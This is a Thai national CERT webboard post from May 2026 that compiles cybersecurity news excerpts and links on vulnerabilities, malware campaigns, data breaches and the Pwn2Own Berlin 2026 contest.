NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 18 May 2026

    Cyber Security News
    1
    1
    56
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย NCSA_THAICERT

      Financial Sector

      • GCC Cyber 2026: How Digital Banking Expansion Is Creating a New Attack Surface Attackers Are Already Exploiting
        "The Gulf Cooperation Council (GCC) region has spent the last several years building one of the world’s most ambitious digital economies. Across Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and the UAE, governments and enterprises have accelerated investments in cloud infrastructure, AI-driven services, smart cities, and digital banking technology at a pace rarely seen elsewhere. Banks are rolling out instant payments, embedded finance services, mobile-first platforms, and API-driven ecosystems designed to support a rapidly expanding fintech economy."
        https://cyble.com/blog/gcc-digital-banking-attack-surface-risks-2026/

      Vulnerabilities

      • Claw Chain: Cyera Research Unveil Four Chainable Vulnerabilities In OpenClaw
        "Cyera's research team identified four previously undisclosed vulnerabilities in OpenClaw, one of the most rapidly adopted open-source platforms for autonomous AI agents. Originally launched as “Clawdbot” in late 2025, OpenClaw connects LLMs directly to filesystems, SaaS applications, credentials, and execution environments - and is increasingly deployed across enterprise workflows for IT automation, customer service, and operational integrations with platforms like Telegram, Discord, and Microsoft Agent 365. The four findings - spanning sandbox isolation, identity, and execution validation - were disclosed to the OpenClaw maintainers in April 2026 and have all been patched."
        https://www.cyera.com/blog/claw-chain-cyera-research-unveil-four-chainable-vulnerabilities-in-openclaw
        https://thehackernews.com/2026/05/four-openclaw-flaws-enable-data-theft.html
        https://hackread.com/claw-chain-vulnerabilities-openclaw-ai-servers-risk/
      • Microsoft Silently Patched a CVSS 9.9 Privilege Escalation In Azure Backup For AKS
        "In March 2026, I discovered a privilege escalation vulnerability in Azure Backup for AKS that allowed a user with only the “Backup Contributor” Azure role (zero Kubernetes permissions) to gain cluster-admin on any AKS cluster. CERT/CC validated this finding as VU#284781 on April 16, 2026. Microsoft rejected it, claiming the “attacker already held administrator access.” This was factually incorrect — the vulnerability grants cluster-admin, it does not require it. On May 12, 2026, I confirmed Microsoft has silently patched the behavior without:"
        https://olearysec.com/research/azure-backup-aks-silent-patch/
        https://www.bleepingcomputer.com/news/security/microsoft-rejects-critical-azure-vulnerability-report-no-cve-issued/
      • Microsoft Warns Of Exchange Zero-Day Flaw Exploited In Attack
        "On Thursday, Microsoft shared mitigations for a high-severity Exchange Server vulnerability exploited in attacks that allow threat actors to execute arbitrary code via cross-site scripting (XSS) while targeting Outlook on the web users. Microsoft describes this security flaw (CVE-2026-42897) as a spoofing vulnerability affecting up-to-date Exchange Server 2016, Exchange Server 2019, and Exchange Server Subscription Edition (SE) software. While patches aren't yet available to permanently fix the vulnerability, the company added that the Exchange Emergency Mitigation Service (EEMS) will provide automatic mitigation for Exchange Server 2016, 2019, and SE on-premises servers."
        https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-exchange-zero-day-flaw-exploited-in-attacks/
        https://techcommunity.microsoft.com/blog/exchange/addressing-exchange-server-may-2026-vulnerability-cve-2026-42897/4518498
        https://www.cisa.gov/news-events/alerts/2026/05/15/cisa-adds-one-known-exploited-vulnerability-catalog
        https://thehackernews.com/2026/05/on-prem-microsoft-exchange-server-cve.html
        https://www.infosecurity-magazine.com/news/microsoft-zeroday-exchange-servers/
        https://www.securityweek.com/microsoft-warns-of-exchange-server-zero-day-exploited-in-the-wild/
        https://securityaffairs.com/192204/security/cve-2026-42897-microsoft-confirms-active-exploitation-of-exchange-server-zero-day.html
        https://securityaffairs.com/192240/hacking/u-s-cisa-adds-a-flaw-in-microsoft-exchange-server-to-its-known-exploited-vulnerabilities-catalog.html
      • Critical FunnelKit Vulnerability Threatens 40,000+ WooCommerce Checkouts
        "Sansec is tracking active attacks against Funnel Builder by FunnelKit, a checkout and upsell plugin used on 40,000+ WooCommerce stores. All versions before 3.15.0.3 let unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store. Attackers are planting fake Google Tag Manager scripts into the plugin's "External Scripts" setting. The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout. FunnelKit has shipped a patched version and is asking all customers to update."
        https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited
        https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/
        https://thehackernews.com/2026/05/funnel-builder-flaw-under-active.html
        https://securityaffairs.com/192260/cyber-crime/attackers-exploit-funnel-builder-bug-to-inject-e-skimmers-into-e-stores.html
      • Chrome 148 Update Patches Critical Vulnerabilities
        "Google this week released a Chrome 148 update that resolves 79 vulnerabilities, including 14 critical-severity bugs across multiple components. The first critical issue is a heap buffer overflow in WebML tracked as CVE-2026-8509, for which the internet giant paid a $43,000 bug bounty. Google has not shared details on the flaw, but its severity rating and the paid amount suggest that it could be exploited for remote code execution. The second critical issue is CVE-2026-8510, an integer overflow weakness in Skia that earned the reporting researcher a $25,000 reward."
        https://www.securityweek.com/chrome-148-update-patches-critical-vulnerabilities/
      • New Windows 'MiniPlasma' Zero-Day Exploit Gives SYSTEM Access, PoC Released
        "A cybersecurity researcher has released a proof-of-concept exploit for a Windows privilege escalation zero-day dubbed "MiniPlasma" that lets attackers gain SYSTEM privileges on fully patched Windows systems. The exploit was published by a researcher known as Chaotic Eclipse, or Nightmare Eclipse, who released both the source code and a compiled executable on GitHub after claiming that Microsoft failed to properly patch a previously reported 2020 vulnerability. According to the researcher, the flaw impacts the 'cldflt.sys' Cloud Filter driver and its 'HsmOsBlockPlaceholderAccess' routine, which was originally reported to Microsoft by Google Project Zero researcher James Forshaw in September 2020."
        https://www.bleepingcomputer.com/news/microsoft/new-windows-miniplasma-zero-day-exploit-gives-system-access-poc-released/

      Malware

      • Inside The REMUS Infostealer: Session Theft, MaaS, And Rapid Evolution
        "In recent months, a new infostealer malware known as REMUS has emerged across the cybercrime landscape, drawing attention from security researchers and malware analysts. Several technical analyses published in recent months focused on the malware’s capabilities, infrastructure, and similarities to Lumma Stealer, including browser targeting mechanisms, and credential theft functionality and more. However, far less attention has been given to the underground operation behind the malware itself."
        https://www.bleepingcomputer.com/news/security/inside-the-remus-infostealer-session-theft-maas-and-rapid-evolution/
      • PureLogs: Delivery Via PawsRunner Steganography
        "The use of steganography in the threat landscape continues to accelerate. Threat actors are increasingly shifting from direct encrypted transfers to a 'legitimate-file-plus-hidden-data' model, effectively masking their next-stage payloads within everyday media. FortiGuard Labs recently uncovered a phishing campaign that abuses environment variables to hide malicious commands and uses PawsRunner as a Steganography Loader to deploy the .NET infostealer PureLogs."
        https://www.fortinet.com/blog/threat-research/purelogs-delivery-via-pawsrunner-steganography
      • From PyInstaller To XWorm V7.4: Infection Chain Analysis
        "Point Wild conducted an in-depth analysis of a suspicious PyInstaller-packed Python sample and identified it as a multi-stage malware loader designed to deploy the XWorm Remote Access Trojan (RAT), specifically associated with the XWorm V7.4 campaign. The sample leveraged multiple layers of obfuscation, staged execution and anti-analysis techniques to conceal its true functionality and evade detection by traditional security controls."
        https://www.pointwild.com/threat-intelligence/from-pyinstaller-to-xworm-v7-4-infection-chain-analysis/
        https://hackread.com/hackers-pyinstaller-amsi-patching-xworm-rat-v7-4/
      • New Calendar Invite Phishing Campaign: ICS Abuse And Post-Delivery Persistence
        "Fortra Intelligence and Research Experts (FIRE) have identified an ongoing campaign combining ConsentFix (also known as device code phishing) to harvest Microsoft account credentials and calendar phishing (or CalPhishing) to bypass security controls and push users closer to the 'trusted' workflow. This activity is likely linked to the EvilTokens AI-enabled phishing kit, which has been known to include calendar phishing as an option. However, CalPhishing appears to be the increasingly preferable method of delivery thanks to its ability to bypass defences."
        https://www.fortra.com/blog/new-calendar-invite-phishing-campaign-ics-abuse-and-post-delivery-persistence
        https://hackread.com/calphishing-eviltokens-kit-outlook-invites-m365/
      • Gremlin Stealer's Evolved Tactics: Hiding In Plain Sight With Resource Files
        "This article examines new obfuscation techniques the Gremlin stealer malware uses to conceal malicious payloads within embedded resources. We analyze a variant protected by a sophisticated commercial packing utility that employs instruction virtualization, transforming the original code into a custom, non-standard bytecode executed by a private virtual machine. Gremlin stealer siphons sensitive information from compromised systems and exfiltrates it to attacker‑controlled servers for potential publication or sale. It targets web browsers, system clipboard and local storage to exfiltrate sensitive information like:"
        https://unit42.paloaltonetworks.com/gremlin-stealer-evolution/
        https://www.infosecurity-magazine.com/news/gremlin-stealer-evolves-into/
      • Cato CTRL Threat Research: Suspected China-Linked Threat Actor Targets Global Manufacturer With Undocumented TencShell Malware
        "In April 2026, Cato CTRL identified and blocked an attempted intrusion against a global manufacturing customer involving TencShell, a previously undocumented, Go-based implant derived from the open-source Rshell C2 framework. The activity appeared in traffic associated with a third-party user connected to the customer environment. The attack chain used a first-stage dropper, Donut shellcode, a masqueraded .woff web-font resource, memory injection, and web-like C2 communication. We assess the activity as suspected China-linked based on the apparent Rshell lineage, Tencent-themed API impersonation, and infrastructure patterns, While this pattern is relevant to our suspected China-linked assessment, it is not sufficient on its own for attribution."
        https://www.catonetworks.com/blog/cato-ctrl-suspected-china-linked-threat-actor-targets-global-manufacturer/
        https://www.infosecurity-magazine.com/news/china-hackers-tencshell-malware/
      • Kazuar: Anatomy Of a Nation-State Botnet
        "Kazuar, a sophisticated malware family attributed to the Russian state actor Secret Blizzard, has been under constant development for years and continues to evolve in support of espionage-focused operations. Over time, Kazuar has expanded from a relatively traditional backdoor into a highly modular peer-to-peer (P2P) botnet ecosystem designed to enable persistent, covert access to target environments. This upgrade aligns with Secret Blizzard’s broader objective of gaining long-term access to systems for intelligence collection. The threat actor has historically targeted organizations in the government and diplomatic sector in Europe and Central Asia, as well as systems in Ukraine previously compromised by Aqua Blizzard, very likely for the purpose of obtaining information supporting Russia’s foreign policy and military objectives."
        https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/
        https://thehackernews.com/2026/05/turla-turns-kazuar-backdoor-into.html
        https://www.bleepingcomputer.com/news/security/russian-hackers-turn-kazuar-backdoor-into-modular-p2p-botnet/
        https://securityaffairs.com/192231/apt/russian-apt-turla-builds-long-term-access-tool-with-kazuar-botnet-evolution.html
      • Tinker Tailor Soldier: Paper Werewolf’s Latest Toolkit
        "In March—April 2026, we uncovered a new campaign by Paper Werewolf targeting Russian industrial, financial, and transport organizations. The analysis revealed several previously undescribed malware instances, including a custom‑built stealer we dubbed PaperGrabber, loaders and downloaders written in C++, C#, Python, and JavaScript, and a novel shellcode‑based implant for the Mythic post‑exploitation framework."
        https://bi.zone/eng/expertise/blog/kamen-nozhnitsy-bumaga-novyy-instrumentariy-v-atakakh-klastera-paper-werewolf/
      • Tycoon 2FA Operators Adopt OAuth Device Code Phishing
        "In late April 2026, the eSentire Threat Response Unit (TRU) analyzed a phishing campaign that combines two trends TRU has tracked over the past year. The first is the continued operation of the Tycoon 2FA Phishing-as-a-Service (PhaaS) kit despite the March 2026 coalition takedown led by Microsoft and Europol in collaboration with eSentire and other industry partners; the second is the broader shift toward abusing OAuth Device Authorization Grant flows to compromise Microsoft 365 accounts."
        https://www.esentire.com/blog/tycoon-2fa-operators-adopt-oauth-device-code-phishing
        https://www.bleepingcomputer.com/news/security/tycoon2fa-hijacks-microsoft-365-accounts-via-device-code-phishing/
      • Scammers Send Physical Phishing Letters To Steal Ledger Wallet Seed Phrases
        "Crypto wallet owners using Ledger hardware wallets are being targeted through physical mail, with scammers impersonating the company in a campaign designed to steal recovery seed phrases. The operation uses printed letters that look official, complete with Ledger branding, a reference number, and a fake security notice warning recipients about an urgent “Quantum Resistance” update. One example of the scam circulating online shows an Italian language version addressed to a customer in Italy, suggesting the attackers are tailoring the campaign based on regional customer data. The letter claims users must complete a mandatory security upgrade for their Ledger device before a deadline or risk losing wallet functionality."
        https://hackread.com/scammers-physical-phishing-letters-ledger-wallet-seed/

      Breaches/Hacks/Leaks

      • American Lending Center Data Breach Affects 123,000 Individuals
        "American Lending Center this week revealed that a data breach discovered last year has impacted more than 123,000 individuals. American Lending Center (ALC) is a California-based non-bank lender that manages a $3 billion portfolio specializing in government-guaranteed small business loans. The organization is notifying individuals affected by the data breach that information such as names, dates of birth, and SSNs may have been stolen in a ransomware attack detected in July 2025."
        https://www.securityweek.com/american-lending-center-data-breach-affects-123000-individuals/
      • More Than $10 Million Stolen From Crypto Platform THORChain
        "Cryptocurrency platform THORChain said more than $10 million was stolen during a security incident on Friday morning. The cyberattack was first identified by blockchain security firm Peckshield and cryptocurrency investigator Zachary Wolk, who goes by the online alias ZachXBT. Around 6 am EST, both reported that more than 36 Bitcoin, worth about $3 million, and another $7 million in other coins was siphoned from THORChain. THORChain published its own statement shortly after confirming the incident."
        https://therecord.media/more-than-10-million-stolen-crypto-platform-thorchain
      • Grafana GitHub Token Breach Led To Codebase Download And Extortion Attempt
        "Grafana has disclosed that an "unauthorized party" obtained a token that granted them the ability to access the company's GitHub environment and download its codebase. "Our investigation has determined that no customer data or personal information was accessed during this incident, and we have found no evidence of impact to customer systems or operations," Grafana said in a series of posts on X. The company also said it immediately launched a forensic analysis upon discovering the activity and that it identified the source of the leak, adding the compromised credentials have since been invalidated, and extra security measures have been implemented to secure against unauthorized access."
        https://thehackernews.com/2026/05/grafana-github-token-breach-led-to.html
        https://hackread.com/grafana-source-code-theft-rejected-ransom-demand/

      General News

      • Pwn2Own Berlin 2026, Day One: $523,000 Paid Out, AI Products Fall
        "Day one of Pwn2Own Berlin 2026 featured 22 entries targeting widely used technologies, including browsers, operating systems, AI platforms, and NVIDIA infrastructure. By the end of the day, researchers demonstrated 24 unique zero-day vulnerabilities and earned a total of $523,000 in rewards, highlighting ongoing security risks across major enterprise and consumer software ecosystems. Orange Tsai of the DEVCORE Research Team made the headlines; he chained four separate logic bugs to escape the Microsoft Edge sandbox, a technically demanding achievement that earned him $175,000 and 17.5 Master of Pwn points in a single attempt. It was the kind of result that reminds you why this competition exists: not to embarrass vendors, but to surface flaws in controlled conditions before someone with worse intentions finds them first."
        https://securityaffairs.com/192183/hacking/pwn2own-berlin-2026-day-one-523000-paid-out-ai-products-fall.html
      • Microsoft Exchange, Windows 11 Hacked On Second Day Of Pwn2Own
        "During the second day of Pwn2Own Berlin 2026, competitors collected $385,750 in cash awards after exploiting 15 unique zero-day vulnerabilities in multiple products, including Windows 11, Microsoft Exchange, and Red Hat Enterprise Linux for Workstations. The Pwn2Own Berlin 2026 hacking competition takes place at the OffensiveCon conference from May 14 to May 16 and focuses on enterprise technologies and artificial intelligence. Security researchers can earn over $1,000,000 in cash and prizes by hacking fully patched products in the web browser, enterprise applications, cloud-native/container environments, virtualization, local privilege escalation, servers, local inference, and LLM categories."
        https://www.bleepingcomputer.com/news/security/pwn2own-day-two-hackers-demo-microsoft-exchange-windows-11-red-had-enterprise-linux-zero-days/
        https://securityaffairs.com/192209/security/pwn2own-berlin-2026-day-two-385750-more-microsoft-exchange-falls-and-the-running-total-crosses-900k.html
      • Pwn2Own Berlin 2026, Day Three: DEVCORE Crowned Master Of Pwn, $1.298 Million Total
        "Pwn2Own Berlin 2026 ended after three intense days, with participants discovering 47 unique zero-days, and earning $1,298,250 in total payouts. Pwn2Own Berlin 2026 wrapped up at OffensiveCon on Saturday with a final day that sealed DEVCORE’s dominance across every metric that matters. That's a wrap on Pwn2Own Berlin 2026! 🏆 $1,298,250 awarded. 47 unique 0-days. 3 days of absolute chaos. And talk about main character energy – congrats to DEVCORE for claiming Master of Pwn with 50.5 points and $505,000 – they never slowed down. See you next year! #Pwn2Own… pic.twitter.com/ZcWN8VPLDS — TrendAI Zero Day Initiative (@thezdi) May 16, 2026"
        https://securityaffairs.com/192250/hacking/pwn2own-berlin-2026-day-three-devcore-crowned-master-of-pwn-1-298-million-total.html
      • Microsoft Backpedals: Edge To Stop Loading Passwords Into Memory
        "Microsoft is updating the Edge web browser to ensure it no longer loads saved passwords into process memory in clear text at startup after previously stating it was "by design." This behavior was disclosed on May 4 by security researcher Tom Jøran Sønstebyseter Rønning, who demonstrated that all credentials stored in the Edge built-in password manager were decrypted on launch and kept in memory even when not in use. Rønning also released a proof-of-concept (PoC) tool that would allow attackers with Administrator privileges to dump passwords from other users' Edge processes (without admin privileges, the PoC only allows accessing Edge processes launched by the same user)."
        https://www.bleepingcomputer.com/news/microsoft/microsoft-edge-to-stop-loading-cleartext-passwords-in-memory-on-startup/
      • The Boring Stuff Is Dangerous Now
        "Are you freaking out? It feels like the entire industry is losing its head over the collision of two huge security pressures. First, every development team has suddenly been mandated to use AI coding tools, resulting in thousands of new bugs and misconfigurations. This has coincided with the announcement that, if Claude Mythos was unleashed, it would exploit every unknown vulnerability out there. It’s enough to make everyone from triagers and CISOs want to give up. Let’s consider how both scenarios play out, and what it means for vulnerability discovery, vulnerability management, and actual risk reduction."
        https://www.darkreading.com/cyber-risk/ai-code-and-agents-forces-defenders-adapt
      • The Next Cybersecurity Challenge May Be Verifying AI Agents
        "For the past two decades, cybersecurity has largely been a story about protecting humans from machines blocking malware, filtering phishing emails, companies mitigating DDoS attacks, and patching software vulnerabilities before attackers exploit them. The adversary was clear. The surface was known. The playbook, while imperfect, was at least legible, but that story is now changing. The next major frontier in cybersecurity is not defending against AI. It is figuring out how to trust it."
        https://hackread.com/next-cybersecurity-challenge-verifying-ai-agents/

      อ้างอิง
      Electronic Transactions Development Agency (ETDA) 068ff30d-5170-4a28-a399-89f3aa493977-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post